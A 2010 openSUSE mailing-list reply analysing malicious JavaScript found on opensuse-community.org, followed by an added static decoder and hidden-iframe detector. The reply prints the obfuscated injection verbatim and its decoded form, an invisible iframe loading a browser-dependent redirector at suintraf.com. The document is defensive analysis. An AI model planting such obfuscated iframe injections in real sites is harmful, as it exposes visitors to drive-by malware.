Hello, On Thu, 01 Jul 2010, Marcus Meissner wrote:
On Thu, Jul 01, 2010 at 06:35:44PM +0200, Cristian Morales Vega wrote:
2010/7/1 Andrea Florio:
According to firefox/google, opensuse-community.org is a bad website... anything we can do??
The FAQ explains how it works: http://www.stopbadware.org/home/faq
But it's my understanding that it has already been reported: http://www.stopbadware.org/reports/8e9ba36718d9116809d178a7057d0f47
curl http://opensuse-community.org/Welcome_to_openSUSE-Community.org|less
The very first line looks truly like malware:
script language=JavaScript document.write(unescape('%3c'+'%73cri%70t language=Java%53cript%3edo'+'cu%6d%65n%74.write%28unesca%70%65%28%27%253c%69frame%25%320w%27+%27i%25%364%27+'+'%27%74h=1%20he%25%369g%27+%27%68t%253d1 %62%256f'+'%2572d%256'+'5r=%27+%270 %256%36%72amebo%2572'+'der%253%640 %257%33%2572c=%2527h%257%34%74%27+%27p:%252%66%2f%73uin'+'%2574%25%372a%256%36.co%256d/top%25310'+'%25%330/in%2e%63g%69%3f%34%2527%25%33e%253c%2f%256%39%66ram%256%35%253%65%27%29%29%3c/s'+'%63ript%3e'))
So it seems at a deeper look.

$ jsshell
js> unescape('%3c'+'%73cri%70t language=Java%53cript%3edo'+'cu%6d%65n%74.write%28unesca%70%65%28%27%253c%69frame%25%320w%27+%27i%25%364%27+'+'%27%74h=1%20he%25%369g%27+%27%68t%253d1 %62%256f'+'%2572d%256'+'5r=%27+%270 %256%36%72amebo%2572'+'der%253%640 %257%33%2572c=%2527h%257%34%74%27+%27p:%252%66%2f%73uin'+'%2574%25%372a%256%36.co%256d/top%25310'+'%25%330/in%2e%63g%69%3f%34%2527%25%33e%253c%2f%256%39%66ram%256%35%253%65%27%29%29%3c/s'+'%63ript%3e')
<script language=JavaScript>document.write(unescape('%3ciframe%20w'+'i%64'+'th=1 he%69g'+'ht%3d1 b%6f%72d%65r='+'0 %66ramebo%72der%3d0 %73%72c=%27h%74t'+'p:%2f/suin%74%72a%66.co%6d/top%310%30/in.cgi?4%27%3e%3c/%69fram%65%3e'))</script>
js> unescape('%3ciframe%20w'+'i%64'+'th=1 he%69g'+'ht%3d1 b%6f%72d%65r='+'0 %66ramebo%72der%3d0 %73%72c=%27h%74t'+'p:%2f/suin%74%72a%66.co%6d/top%310%30/in.cgi?4%27%3e%3c/%69fram%65%3e')
<iframe width=1 height=1 border=0 frameborder=0 src='http://suintraf.com/top100/in.cgi?4'></iframe>
js>

So, it "injects" an "invisible" 1x1 iframe.

The weird stuff is: http://suintraf.com/top100/in.cgi?4 redirects to linux.com, if you call it as a linux browser. But if you call it as e.g. an ie6, you get redirected to http://www.google.com/errors/asfe/system_down.html

So, I guess depending on which browser you use (and whatever else) you could get redirected to a site where malware is, trying to be installed as drive-by-download or whatever.

Anyway, JavaScript unescape orgies are always a bad sign. Please, tell the admins to reinstall from a clean source / backups.

And webpin's index has been broken for quite a while anyway.

-dnh

PS: jsshell is part of libjs, no idea if oS/packman package it.

--
[Stefan Wegmann is looking for a visually appealing burning program]
Hmmmm, I hadn't looked at the whole thing from that angle yet. What would suit your refined aesthetic standards? A delicate chartreuse in slightly fluffy contrast to a springlike Easter-egg-yolk yellow? With buttons in a floral design and chiffon-like help windows with an airy, translucent look? [Thomas Templin in suse-linux]
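
The layer-by-layer decoding done by hand in jsshell in the message above can also be done statically, without evaluating any of the injected script. This is an added example, not part of the original thread: the helper names (peelLayers, hiddenIframes) are hypothetical, and the sample payload and its host tracker.example.invalid are constructed.

```javascript
// Added example: peel document.write(unescape(...)) layers statically, never eval().
// Decode %XX / %uXXXX the way the legacy unescape() does.
const pctDecode = s => s.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
  (_, u, h) => String.fromCharCode(parseInt(u || h, 16)));

// unescape( 'lit' + 'lit' + ... ) whose argument is only single-quoted literals.
const CALL = /unescape\(\s*((?:'[^']*'\s*\+?\s*)+)\)/;

function peelLayers(src, maxDepth = 10) {
  const layers = [];
  let cur = src;
  for (let i = 0; i < maxDepth; i++) {
    const m = CALL.exec(cur);
    if (!m) break;
    // Join the literals first: an escape may be split across a '+' boundary.
    const joined = [...m[1].matchAll(/'([^']*)'/g)].map(x => x[1]).join('');
    cur = pctDecode(joined);
    layers.push(cur);
  }
  return layers;
}

// Return the src of every iframe whose width and height are both <= 1.
function hiddenIframes(html) {
  const out = [];
  for (const [tag] of html.matchAll(/<iframe\b[^>]*>/gi)) {
    const a = {};
    for (const m of tag.matchAll(/\b(width|height|src)\s*=\s*(?:'([^']*)'|"([^"]*)"|([^\s>]+))/gi))
      a[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
    if (Number(a.width) <= 1 && Number(a.height) <= 1 && a.src) out.push(a.src);
  }
  return out;
}

// Constructed sample (placeholder host), double-encoded and split like the page's payload.
const enc = s => [...s].map(c => '%' + c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
const wrap = h => { const e = enc(h);
  return "<script language=JavaScript>document.write(unescape('" +
         e.slice(0, 10) + "'+'" + e.slice(10) + "'))</script>"; };
const INNER = "<iframe width=1 height=1 border=0 frameborder=0 " +
              "src='http://tracker.example.invalid/in.cgi?4'></iframe>";
const SAMPLE = wrap(wrap(INNER));

const layers = peelLayers(SAMPLE);
console.log(layers.length, hiddenIframes(layers[layers.length - 1]));
```

The decoder only handles arguments made of single-quoted string literals, which is the form used in the payload quoted in this thread; anything built at runtime needs a different approach.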